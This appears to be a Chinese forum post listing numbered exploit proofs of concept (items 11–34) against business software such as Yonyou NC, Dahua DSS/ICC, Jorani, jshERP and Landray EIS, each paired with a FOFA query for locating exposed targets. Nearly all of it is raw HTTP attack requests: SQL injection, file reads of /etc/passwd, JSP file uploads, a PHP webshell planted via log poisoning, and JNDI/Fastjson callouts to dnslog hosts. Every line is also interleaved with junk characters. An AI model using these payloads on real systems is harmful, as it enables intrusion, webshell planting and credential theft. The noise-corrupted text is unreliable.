# @9 ~0 }0 m4 @% L/ Q* B2 e------WebKitFormBoundaryxdgaqmqu--8 `! W" F' f/ q" H+ C. n

$ w' x% E% s7 O- F4 ~; J3 e; ~
& b1 s" Y/ F6 h2 Q% u6 `11. 蓝凌EIS智慧协同平台 doc_fileedit_word.aspx SQL注入
- h+ _3 j+ D. h; M1 y5 r. H& ZFOFA:icon_hash="953405444" || app="Landray-EIS智慧协同平台". l7 ~- d# _8 `& \# H! F) c
GET /dossier/doc_fileedit_word.aspx?recordid=1'%20and%201=@@version--+&edittype=1,1 HTTP/1.1
. t. T  ~+ U1 j2 y6 zHost: 127.0.0.1+ x' c7 {& [: a- s' O! U# j+ V
Pragma: no-cache+ p" b7 H; Y, d1 f
Cache-Control: no-cache8 G% Y4 Y8 Y1 h' m: M
Upgrade-Insecure-Requests: 1
5 A. e9 P+ {. ~8 E! z. p# j- A, `User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.368 z) [; O0 d  e# [! [: C
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
2 K' f, e' f$ ^" {9 `Accept-Encoding: gzip, deflate
4 c4 X8 q5 U' z4 h1 ?$ ^Accept-Language: zh-CN,zh;q=0.9,en;q=0.8. E; c: {! J3 e) F
Connection: close
/ H- W* f) d% F( p+ V
/ [* g& Y" B& s3 L3 u  _' @# q4 Y7 Y* P; H
12. Jorani < 1.0.2 远程命令执行
! @* Y# Y" z$ i: fFOFA:title="Jorani"
) O! @) A: [& E  C- w$ J第一步先拿到cookie
. z$ _+ z! a' i3 Q6 M2 x1 LGET /session/login HTTP/1.1+ P$ M! z7 N$ D" c9 E% Z
Host: 192.168.190.30
& D" O- n0 r: q  c( Y6 a! {User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.2309.372 Safari/537.36
9 s5 a$ L8 [7 ^/ Q2 Y) O& PConnection: close( T" \3 F, s+ Z6 g2 n& B' [
Accept-Encoding: gzip( x) f! X( v" B$ t+ R2 C

9 @& L7 h  \. \! t* q$ I
( S0 `, s$ j! j响应中csrf_cookie_jorani用于后续请求
" k- V; Z0 }9 k8 h' M/ {HTTP/1.1 200 OK* G# R- x* h7 t9 R! r
Connection: close2 f" Z0 z" X. G. D  a( N
Cache-Control: no-store, no-cache, must-revalidate
: E- S$ L: o' b9 R( F" }2 P% H+ uContent-Type: text/html; charset=UTF-88 L4 \) v' h0 y' m
Date: Tue, 24 Oct 2023 09:34:28 GMT' f3 W5 a  R# G2 b& A9 N9 T1 w9 X
Expires: Thu, 19 Nov 1981 08:52:00 GMT8 `( p; {. @  Q! }6 ^- y0 R
Last-Modified: Tue, 24 Oct 2023 09:34:28 GMT
0 e! |3 i# _. ^( D, V0 j3 fPragma: no-cache
2 d+ D; U3 K; Q/ E3 qServer: Apache/2.4.54 (Debian)
1 e+ `$ ?: W. Y+ \( O) ASet-Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/: ^9 i3 n4 X; R4 B3 K6 q
Set-Cookie: jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r; expires=Tue, 24-Oct-2023 11:34:28 GMT; Max-Age=7200; path=/; HttpOnly
/ S5 N- W. }0 u+ Y7 R; fVary: Accept-Encoding+ ]  L; \# G9 e, e+ }$ |

$ Z5 L) m, D" P2 v  G% s; r% z* o! g  P" k- U
POST请求,执行函数并进行base64编码
! N" J! F5 H0 q4 }POST /session/login HTTP/1.1
$ {* A: z2 G3 o. d( v9 x: w1 vHost: 192.168.190.30
2 f( B6 s$ S  U: J! W( EUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_8_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/54.0.2866.71 Safari/537.367 f# i& h) q' A" n! W- n
Connection: close
) |7 g% J% b% W, P$ hContent-Length: 252' T, t6 K  V0 {% U8 B8 K
Content-Type: application/x-www-form-urlencoded
, Q) m8 @1 \- o# a5 L* A! GCookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
6 S# z9 c8 c4 Z$ A8 ~Accept-Encoding: gzip' L; y  H% a4 ~: h3 U

! l5 _3 \' T% j+ f: Z3 Z: {( ecsrf_test_jorani=6ca560f2b0baf3cda87c818a4a15dc77&last_page=session%2Flogin&language=..%2F..%2Fapplication%2Flogs&login=<?php if(isset($_SERVER['HTTP_K1SYJPMHLU4Z'])){system(base64_decode($_SERVER['HTTP_K1SYJPMHLU4Z']));} ?>&CipheredValue=DummyPasswor) o) {+ t6 w& w+ U* r( Z( j, u
6 D8 y3 R2 D) ]( I* n

' I( P9 a; `  n- l  e  o3 x  \5 K" e
4 [# R4 L# s  Y$ {6 Z0 N8 f, K向靶场发送如下请求,执行id命令,请求头中的ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=是命令base64编码后的字符串! M0 M- `' X% C1 H
GET /pages/view/log-2023-10-24 HTTP/1.1; T3 m! Z1 w8 D2 B. r
Host: 192.168.190.30
  i! ?# z# `2 wUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
- f" j/ ?4 F$ f$ xConnection: close
) @% W+ l9 N4 s! \Cookie: csrf_cookie_jorani=6ca560f2b0baf3cda87c818a4a15dc77; jorani_session=bqk0ttr6q2mg3tae6rd75ei02umkq99r
% S  K+ V) a( {9 CK1SYJPMHLU4Z: ZWNobyAtLS0tLS0tLS07aWQgMj4mMTtlY2hvIC0tLS0tLS0tLTs=
) ^: u1 f+ m( x% K+ f; q( c) _& XX-REQUESTED-WITH: XMLHttpRequest' G/ g9 o, u& r' q& r
Accept-Encoding: gzip  d: |. d7 x' W; \; h
- j8 n3 d4 ]" `- |% i$ B

9 h2 a) e0 n  `; s3 }; K13. 红帆iOffice ioFileDown任意文件读取, Z8 e9 d3 D4 h: f+ U
FOFA:app="红帆-ioffice"
, l' ~$ Z7 K1 N" o" l  I) VGET /ioffice/prg/interface/ioFileDown.aspx?sFilePath=c:/windows/win.ini HTTP/1.1  c0 |8 [- S- n
Host: x.x.x.x
. {1 z4 R0 ^- {4 d7 jUser-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.67 Safari/537.36% C/ E) {( q4 v7 }. S( `; I
Connection: close7 _1 y3 c- h0 T; q( T( ^; i; F
Accept: */*+ ^1 s" H0 K9 z: P, `) p! d) \
Accept-Encoding: gzip; I) v3 X+ y5 @

6 D, P  c# b( _! x5 _0 A& V. e0 @. {3 h/ N& w% n$ m
14. 华夏ERP(jshERP)敏感信息泄露
9 w& ~2 k4 y7 V  U: WFOFA:body="jshERP-boot"  s; R5 X% d3 m/ \8 p0 U& K
泄露内容包括用户名密码2 h, T& p( X7 a4 D5 n; a2 t& ^6 ], i
GET /jshERP-boot/user/getAllList;.ico HTTP/1.1  H8 R) T2 K) q! v" t3 G5 q# k7 L
Host: x.x.x.x  q: l1 i" @' t. L  p2 [
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
2 E+ `% ?1 V) i/ Q6 WConnection: close
9 @7 W# E5 k* B4 G  n! @* fAccept: */*
+ r- w3 C& s3 K7 yAccept-Language: en$ V( E2 [" Q9 Z8 S$ f
Accept-Encoding: gzip2 g9 k( C/ F3 j. G+ S/ p% `; [

% D2 B/ G- x7 r; w1 G( O" E
+ [; h5 v- r9 _, y/ R* d$ t' y15. 华夏ERP getAllList信息泄露
& m  |- x1 W- V# ^9 R* T. T) m3 JCVE-2024-0490# R3 N9 g" k2 [$ h! B# }- b3 G
FOFA:body="jshERP-boot"6 c+ h; D" _0 }. M8 h- F' O. t5 o
泄露内容包括用户名密码( a; W% L$ ~, s+ t6 O6 v
GET /jshERP-boot/user/a.ico/../getAllList HTTP/1.1
- G; x) A+ _6 T6 j" R! B$ ^Host: 192.168.40.130:100
" P' m, Z9 |* }  yUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_9_3) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/35.0.1916.47 Safari/537.36
# U  v: p/ l7 A. A( U8 ]" a+ XConnection: close
  P2 w5 I1 {2 F3 }1 z+ tAccept: application/signed-exchange;v=b3;q=0.7,*/*;q=0.8$ _( Z$ P* p/ E* M$ h7 W
Accept-Language: en: H, u4 a, K) |7 R6 C0 M
sec-ch-ua-platform: Windows
2 l1 P% ?& k- I! d8 sAccept-Encoding: gzip
' L& N. e2 A. Y" ~% q) u$ a! s2 S& O( d; S2 ?( k3 c8 i

9 \- G) ?) d" k. ?4 _2 b/ E) t16.  红帆HFOffice医微云SQL注入( {+ K: w- n1 Y5 d; H- r
FOFA:title="HFOffice"2 s9 h& `1 j/ p/ }" U
poc中调用函数计算1234的md5值0 C& c" L* @9 L- w; c
GET /api/switch-value/list?sorts=%5B%7B%22Field%22:%221-CONVERT(VARCHAR(32),%20HASHBYTES(%27MD5%27,%20%271234%27),%202);%22%7D%5D&conditions=%5B%5D&_ZQA_ID=4dc296c6c69905a7 HTTP/1.13 c" I. U& b# T7 F: {3 g. B- [
Host: x.x.x.x5 w+ O9 ]  C; z6 l5 c
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1866.237 Safari/537.36
/ B& J2 I1 h# ]8 y2 `% S$ eConnection: close5 X$ _6 K1 @4 n) h: e
Accept: */*2 A6 G$ Y) X8 Y. A5 g3 d; Y5 J6 h; B
Accept-Language: en% v8 ~. R3 a" B3 i: k
Accept-Encoding: gzip( B# y( e# L) V* {
  ^2 C" F% [$ N3 D

2 P" e  r* I6 L7 F. ~, Y5 c17. 大华 DSS itcBulletin SQL 注入; ?' x$ W% Z' U. y' D; O9 @; u
FOFA:app="dahua-DSS". Z+ U9 u0 r5 y" E8 d0 v$ T& m
POST /portal/services/itcBulletin?wsdl HTTP/1.1
! e1 {' ~: w% ], g; b5 ]2 V4 U! t: zHost: x.x.x.x
. \8 }4 t1 g' _( M2 w" u, }User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; j% o0 z  S) A
Connection: close
' r) ^# Y0 x# ?' FContent-Length: 3454 C5 y: X( |2 k1 C# i$ x. X5 T
Accept-Encoding: gzip: o! r4 g& e/ r' A
9 u5 ?7 }( W( n
<s11:Envelope xmlns:s11='http://schemas.xmlsoap.org/soap/envelope/'>
2 R9 X5 [+ L# k" m6 g- x6 c<s11:Body>6 Z, d/ J+ _/ Q) [& Q
    <ns1:deleteBulletin xmlns:ns1='http://itcbulletinservice.webservice.dssc.dahua.com'>) o8 L1 x1 ~! }
      <netMarkings>$ P& {9 V2 i9 a- N) f) ?
       (updatexml(1,concat(0x7e,md5(102103122),0x7e),1))) and (1=1
) ?4 L2 @! j) O9 ]4 X3 r2 V      </netMarkings>
, a0 P) U1 L1 m7 K+ d& ~; |    </ns1:deleteBulletin>
& j6 v) S) Y/ A  t" h  </s11:Body>/ N- E/ C8 P- x( r' D/ c5 S( l
</s11:Envelope>% a2 o  S/ L5 s# J
: \0 t- B7 ^# _% y2 \5 J8 B6 l2 ?- a6 b

; r, D8 v% r5 o& F- d18. 大华 DSS 数字监控系统 user_edit.action 信息泄露. X! D8 Z# F% R' m7 {1 p
FOFA:app="dahua-DSS"7 w$ H5 T& n6 V
GET /admin/cascade_/user_edit.action?id=1 HTTP/1.1( `7 @0 o* L  b, T$ ]4 T  G! w
Host: your-ip$ u# L8 c) Z$ E
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
! L9 `5 r+ o6 q( _0 y0 CAccept-Encoding: gzip, deflate
0 l: l# _  G/ T& l- KAccept: */*
) T* b; I5 c! Z% KConnection: keep-alive
/ y: |: k+ c0 R8 `& |* s% ^  X- |* z+ A1 o1 T  A! P( X3 f

- s0 ~- d6 M0 T1 r1 ?3 z' t
4 f- a4 P9 w( n  x% }, G1 Z19. 大华 DSS 数字监控系统 attachment_clearTempFile.action SQL注入
3 t7 o4 n2 [. |5 k8 L$ lFOFA:app="dahua-DSS"
; n& T0 Y$ W) wGET /portal/attachment_clearTempFile.action?bean.RecId=1%27)%20AND%20EXTRACTVALUE(8841,CONCAT(0x7e,user(),0x7e))%20AND%20(%27mYhO%27=%27mYhO&bean.TabName=1 HTTP/1.1
( ], M3 p" D2 ~: zHost:, a) Z0 \0 G; H: ^
User-Agent:Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/122.0.0.0 Safari/537.36: _: \; c: j+ |; v8 X" @
Accept-Encoding: gzip, deflate
1 ~! k" E* K7 p, fAccept: */*+ p6 w# E3 R; n9 @7 \
Connection: keep-alive; e; T. T/ S& m7 v# t, P3 s0 S0 {

' D3 ?3 m. Y* J( G) p" [' i4 D* l. |% G- F: E- b# B6 g
20. 大华ICC智能物联综合管理平台任意文件读取
- w; ]& z$ l0 EFOFA:body="*客户端会小于800*"
& i& ?; s9 U0 N+ ?& Z$ }, y! {GET /evo-apigw/evo-cirs/file/readPic?fileUrl=file:/etc/passwd HTTP/1.19 D, B( O1 z) N3 H: O# i5 I
Host: x.x.x.x
5 D' h4 d/ e& z0 j! p0 y) IUser-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/41.0.2227.0 Safari/537.36
& Z9 U& L5 ]# k  C2 c1 cConnection: close4 P' R$ N% r7 b6 Z
Accept: */*% h# _, }  |4 W  j( t4 ~
Accept-Language: en
) W* G/ _5 M7 {  S) n; IAccept-Encoding: gzip
( G) r0 @: p% [! U( U3 J/ X1 T$ a$ T. o) \3 n

$ F. V) ^- Y" a* k" Z21. 大华ICC智能物联综合管理平台random远程代码执行
$ k, Q. W7 r( A* z# dFOFA:icon_hash="-1935899595"" j8 _* F( ]) B4 Q' m% o0 q  {
POST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1/ i& z: P. v  g& o
Host: x.x.x.x7 @; g+ s$ n8 R& I
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15! E+ ^2 p, m; b- \) d5 o
Content-Length: 161% g6 \" s" _0 G. N- |
Accept-Encoding: gzip
) C6 w* Q3 H- x1 J! JConnection: close
  @5 }/ n" h9 R1 x0 sContent-Type: application/json;charset=utf-8+ x0 n* `9 \4 c0 A
) @1 L  ?/ ^* Y% ~4 G
{" J% r: x! m  @) T* g) m/ n
"a":{1 x/ H3 M; i! l; Y  G( U
   "@type":"com.alibaba.fastjson.JSONObject",( n6 |8 j0 |+ j. ^3 I. |! [2 Z/ A
    {"@type":"java.net.URL","val":"http://farr9frh.dnslog.pw"}
( V* C9 W& g$ V, N: l2 h  }""1 ?% d5 ?; Q6 r; h& Z
}' c7 K0 [2 b( h3 f0 E

5 Z/ V9 }7 p  r- j! h. F! Z. W) c! ~7 B* y
22. 大华ICC智能物联综合管理平台 log4j远程代码执行
8 c3 f" o9 C) S& `7 {) x( OFOFA:icon_hash="-1935899595"0 ^; p+ @" l* v
POST /evo-apigw/evo-brm/1.2.0/user/is-exist HTTP/1.1
+ |. ~! ~* |2 X+ z( gHost: your-ip% P/ l5 M' h- i8 x$ g; S
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/121.0.0.0 Safari/537.36
  h/ D8 h$ J( y* _! n( TContent-Type: application/json;charset=utf-8
9 P- p3 _3 a+ d3 J0 P; `
0 w# K" e( t- O4 a3 a1 x* Y; T2 ]{" h& p" V7 `3 e: {
"loginName":"${jndi:ldap://dnslog}"
" Z- j+ x/ l7 N. e! D}( Y  [# ^1 k5 Q' l: }" G" H3 c
3 d1 D+ S! ~' }6 c' ?! P

1 y- ]3 |' \2 D$ S$ I3 ~) I6 h5 ~0 A( p$ v  ?$ F
23. 大华ICC智能物联综合管理平台 fastjson远程代码执行7 }2 r2 g  v, @3 i1 d
FOFA:icon_hash="-1935899595"
# l' M2 N3 z* a) u4 M4 rPOST /evo-runs/v1.0/auths/sysusers/random HTTP/1.1
) f8 c6 h$ y3 e# {  D7 O4 yHost: your-ip& Q( \* q' v7 l2 [8 n) X
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15; P, U9 M& ^. T7 x! e$ G
Content-Type: application/json;charset=utf-8
9 [4 ^" e' {. SAccept-Encoding: gzip4 J9 m- K+ ]0 c. o: O4 p3 ^2 x; j
Connection: close2 ~. s% e, w- G) N7 @2 y. i

2 v- D1 U) \7 v/ Q8 T# [{$ V/ f- q: h- W# h/ P
    "a":{% b1 W- G1 M4 ?% C9 `  @
        "@type":"com.alibaba.fastjson.JSONObject",8 {! R8 B/ l. S/ n. G
       {"@type":"java.net.URL","val":"http://DNSLOG"}4 c7 M: _" b4 H# v1 i7 y
        }""
) t, t4 r, p8 U- e0 s}
7 |( H. A6 u6 Y- @7 F; x( B" a! B5 t4 _, G8 R

" i3 {/ h4 o# k5 H3 s6 g' a+ G24. 用友NC 6.5 accept.jsp任意文件上传
0 `' f2 x* Z  D. lFOFA:icon_hash="1085941792"
! z3 G+ H& V, o2 E8 g/ RPOST /aim/equipmap/accept.jsp HTTP/1.1; x5 T* N2 r0 p- A! x
Host: x.x.x.x; x9 S$ o) Z* j/ n( a
User-Agent: Mozilla/5.0 (X11; OpenBSD i386) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/36.0.1985.125 Safari/537.36" S* q& d: F/ ~7 i6 v" p  T
Connection: close! b) E2 M% @* B, T! t" J
Content-Length: 449
- g8 Q2 P6 e  N7 f2 i  c& ^! EAccept: */*
$ W2 `0 w5 w  j$ _" C" KAccept-Encoding: gzip! \! X3 Z; ~7 i: |; X$ E8 M4 Q' @. r
Content-Type: multipart/form-data; boundary=---------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc2 X/ `% Y: S0 B& _0 a# t0 X
; L9 l0 S2 A, x* b  O+ S/ {
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc! R& _% H1 `; V0 F# n* k
Content-Disposition: form-data; name="upload"; filename="2XpU7VbkFeTFZZLbSMlVZwJyOxz.txt"' u. Z; s+ e6 e4 C/ B! ^' k8 y
Content-Type: text/plain
" J0 `8 z- Y% W+ ]
3 W# F, O8 G/ A: B! [+ `<% out.println("2XpU7Y2Els1K9wZvOlSmrgolNci"); %>0 t* b) a. j# i5 n) f/ U0 a1 n
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc0 E& a; T% J) f. y* }" }- A
Content-Disposition: form-data; name="fname"
1 ?* ?; Z8 ]+ H6 v; r# I5 s: v" W" a2 V
\webapps\nc_web\2XpU7WZCxP3YJqVaC0EjlHM5oAt.jsp) g/ X2 G: ^1 }% k
-----------------------------yFeOihSQU1QYLu0KwhX72U5C1sMYc--
% a) u9 O7 ?) P  y# C8 j2 P
$ T3 ~( ?$ x! a/ O0 r, j% D  X% T3 z7 j7 D
25. 用友NC registerServlet JNDI 远程代码执行/ G, B2 e+ U" O" K3 A3 @
FOFA:app="用友-UFIDA-NC"
/ X  i! s4 W" p5 J! d$ [POST /portal/registerServlet HTTP/1.10 i2 _5 V! Q$ R7 b3 L0 c
Host: your-ip) `5 j/ I/ {' l8 F" S, {$ w
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:71.0) Gecko/20100101 Firefox/71.06 Q8 b8 z/ |3 b0 f. x3 S
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*; q=0.8,application/signed-exchange;v=b3;q=0.9
. G: |$ W- u0 G3 JAccept-Encoding: gzip, deflate
- f0 B2 k5 g0 ?( PAccept-Language: zh,en-US;q=0.9,en-GB;q=0.8,en;q=0.7,zh-CN;q=0.6
2 c* @( F# F' X( V9 ~1 rContent-Type: application/x-www-form-urlencoded
: W7 w+ R. L2 q( o) c& g% e0 U% u& l$ J; P. D) F" k% }
type=1&dsname=ldap://dnslog; r5 ?2 ^3 P* h0 }* P( {/ V6 I# D
1 v! b) F9 {4 B
* g1 W1 B( y6 b% c, a
- u9 g9 a* _4 F; h2 F
26. 用友NC linkVoucher SQL注入
: _. X) U$ b# R+ W) zFOFA:app="用友-UFIDA-NC"
9 a) I. r! T' q, `GET /portal/pt/yercommon/linkVoucher?pageId=login&pkBill=1'waitfor+delay+'0:0:5'-- HTTP/1.14 w  Q' |4 v) ?! `+ K. T) |
Host: your-ip
$ \, R1 m# G% Z6 K- ~2 }( rUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36: t& k/ p- ?  B2 f, [# N
Content-Type: application/x-www-form-urlencoded! S9 v+ V9 x" @; O% `& y/ y
Accept-Encoding: gzip, deflate
1 Z# h9 M) h5 H/ NAccept: */*
8 O7 c( q2 X( P4 AConnection: keep-alive. ?0 j5 {; N9 _6 C9 K

& l% P$ @- U* ~8 Q! s3 ^/ u0 n' ?! f1 a( X/ Y8 j
27. 用友 NC showcontent SQL注入
3 _: [% d$ `, Y# A8 rFOFA:icon_hash="1085941792"4 n2 x! u6 A+ n5 m! s: x
GET /ebvp/infopub/showcontent?id=1'+AND+1=DBMS_PIPE.RECEIVE_MESSAGE(1,5)-- HTTP/1.1$ B. H% {3 n' i6 ^: F; u
Host: your-ip4 N! S2 B9 E7 ?! o+ a6 ?6 K
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
: L) E4 T2 W4 g% u0 PAccept-Encoding: identity3 t& }5 v/ p/ x
Connection: close
9 l& i- N/ x- aContent-Type: text/xml; charset=utf-8
/ t9 r( g$ y+ G; @
( R( \4 w4 {9 j7 @% F
+ m' ~' y8 ?2 r- m28. 用友NC grouptemplet 任意文件上传8 \6 E- ~, B) r! c# f6 F5 ~
FOFA:icon_hash="1085941792"7 Y3 E7 z  D, r! s
POST /uapim/upload/grouptemplet?groupid=nc&fileType=jsp HTTP/1.15 Y1 P+ e9 e3 Q/ L* G& f8 W
Host: x.x.x.x
/ L; E7 C3 X; M0 V  {User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.93 Safari/537.36# T6 k6 n, Y( H* g+ G" W
Connection: close; t5 }; M+ G, ?' e9 [  a
Content-Length: 268
' d" y) _7 p) U; f6 w  YContent-type: multipart/form-data; boundary=----------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
( [1 b% Z: Q& F4 `Accept-Encoding: gzip
/ ^' }; Y4 m" R$ X9 @4 U8 ]
  e" T6 L8 D1 G+ q------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk
8 g6 {4 {2 ~1 l. \Content-Disposition: form-data; name="upload"; filename="2fiu0YTGkaX2DrJlUZZP5IGvNvk.jsp"
+ L3 `8 b( f8 b# f, c/ \6 W) m% TContent-Type: application/octet-stream6 m" `1 l( [% F" V. K9 _

0 A: S( e+ i1 y1 b8 O<%out.println("2fiu0WM4788fa6NcMHipkIthTTW");%>
& [" W. d+ ~/ O' o------------ny4hGVLLpZPZm0CE3KNtyhNSXvFgk--4 G) Y8 U0 ?( R: \% b

5 e. Q* B4 u) V7 u9 J, C
/ I5 H" O  M/ A( f" [' [6 Y3 K/uapim/static/pages/nc/head.jsp
- ~/ D2 M; R2 Q& D3 h2 X2 K* D7 F5 X! m6 {
29. 用友NC down/bill SQL注入
" ^  J% W" L* t8 D% [: o% [. [) n+ zFOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"1 Z9 v6 K/ ~( Z- Y  m, S
GET /portal/pt/erfile/down/bill?pageId=login&id=1'+AND+4563=DBMS_PIPE.RECEIVE_MESSAGE(CHR(65),5)-- HTTP/1.1! Z2 ~4 |" e- t* O. A) c3 p
Host: your-ip
* P3 q4 u. C! K8 x. fUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36, l+ @: w& T6 v8 M! G' t
Content-Type: application/x-www-form-urlencoded- T+ Q) f9 d( T8 t" C0 ^# R
Accept-Encoding: gzip, deflate# ^3 Q- Z) A4 v( v
Accept: */*  m( K5 ~! X$ Y3 P: o* ?
Connection: keep-alive% w2 B, T/ d8 F* w0 i
7 g0 v+ u5 u. b. v; [0 G' M
& M6 F. y5 G% ?3 m) ?0 F3 q% h+ C
30. 用友NC importPml SQL注入; B% I# u0 P3 r8 z. B; O& L1 Y
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
. \/ Y7 k; {: @0 j4 a) a, _POST /portal/pt/portalpage/importPml?pageId=login&billitem=1'WAITFOR+DELAY+'0:0:5'-- HTTP/1.1
# ^/ Y& Z; l% F. G7 |: }1 zHost: your-ip
* r: V! z( l; F: `+ l! O/ wContent-Type: multipart/form-data; boundary=----WebKitFormBoundaryH970hbttBhoCyj9V3 V; ^0 O+ s# Q1 e7 c. w7 u
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/123.0.0.0 Safari/537.36
; S) ]; g5 ]/ ^9 [5 O# T: [0 e6 vConnection: close: i/ A4 P8 p& \2 m9 X) X/ K! n

6 [2 c" R" J8 x7 C: H------WebKitFormBoundaryH970hbttBhoCyj9V
- E- @* g* o% V- v4 f% M, IContent-Disposition: form-data; name="Filedata"; filename="1.jpg"
! [! r- {. t3 X' {% YContent-Type: image/jpeg
$ Q+ s# u3 E9 v& M5 D------WebKitFormBoundaryH970hbttBhoCyj9V--6 [3 h3 }8 Q6 l" g
: g* Q9 F4 W8 `0 ?6 V$ Z5 b
4 f  h0 Q2 C- E% `( o
31. 用友NC runStateServlet SQL注入
1 |7 j/ D! ~+ u" U' e2 Q+ |# M8 r  kversion<=6.5% G  L5 `  y6 s
FOFA:icon_hash="1085941792" && body="/logo/images/logo.gif"
- V) v4 R9 a9 j, dGET /portal/pt/servlet/runStateServlet/doPost?pageId=login&proDefPk=1'waitfor+delay+'0:0:5'-- HTTP/1.1* v8 A! I; n3 K. _1 M
Host: host  {4 k& W' A3 ?$ q/ k
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/83.0.4103.116 Safari/537.36; N+ b- i9 a# p
Content-Type: application/x-www-form-urlencoded
2 a1 U  w. a- h: m2 y( l  c6 Y8 X1 }* \" c( M; q
- j7 M# {, h- S" C7 [- y1 C, t
32. 用友NC complainbilldetail SQL注入
' @' b( v: z& `' p# L8 D: Sversion= NC633、NC65
% s3 J6 ?* `" A* G) r3 l( X- ]0 lFOFA:app="用友-UFIDA-NC"
, p' q4 S0 ^! ~  g( }# gGET /ebvp/advorappcoll/complainbilldetail?pageId=login&pk_complaint=1'waitfor+delay+'0:0:5'-- HTTP/1.1
- v  W5 T* Y1 e( OHost: your-ip
/ ^: M1 b* j3 u4 \User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.36
8 h7 U6 }: R! dContent-Type: application/x-www-form-urlencoded
& q9 w1 e/ d: B8 N$ `Accept-Encoding: gzip, deflate3 S" K& @6 J9 M9 i- T9 Y
Accept: */*
2 V" h$ e9 b, x2 O  `( e( L, _$ }Connection: keep-alive  o: S+ z0 f+ ?  T9 _
4 F( m( B7 z- S) c1 d
2 J- S0 |! ]& E4 z
33. 用友NC downTax/download SQL注入5 z( F0 G0 [0 q' F- O3 W1 d
version:NC6.5FOFA:app="用友-UFIDA-NC"! d% u; [2 ^1 S2 ~: {% }# |: Y; G/ ~
GET /portal/pt/downTax/download?pageId=login&classid=1'waitfor+delay+'0:0:5'-- HTTP/1.16 p  X0 p/ A8 ^1 Q5 G  J9 ^7 g% d
Host: your-ip: q7 v4 H3 G( R% z
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.77 Safari/537.369 v/ V6 [1 ^4 A. }) d1 k
Content-Type: application/x-www-form-urlencoded& W" a$ U) {4 m+ }" f/ n& K7 M
Accept-Encoding: gzip, deflate8 G3 j9 \  a5 j5 l5 y& N
Accept: */*
6 m* F6 g9 R- o2 i/ }! {0 @Connection: keep-alive. }& H( ]& f0 X/ a$ G& Q8 k, ~

2 @2 M* r% m; @* v
- ~% \6 H+ E% Y34. 用友NC warningDetailInfo接口SQL注入
, ?% I" {3 [7 w' ~1 uFOFA:app="用友-UFIDA-NC"2 d' ]2 q  J2 N+ _
GET /ebvp/infopub/warningDetailInfo?pageId=login&pkMessage=1'waitfor+delay+'0:0:5'-- HTTP/1.1
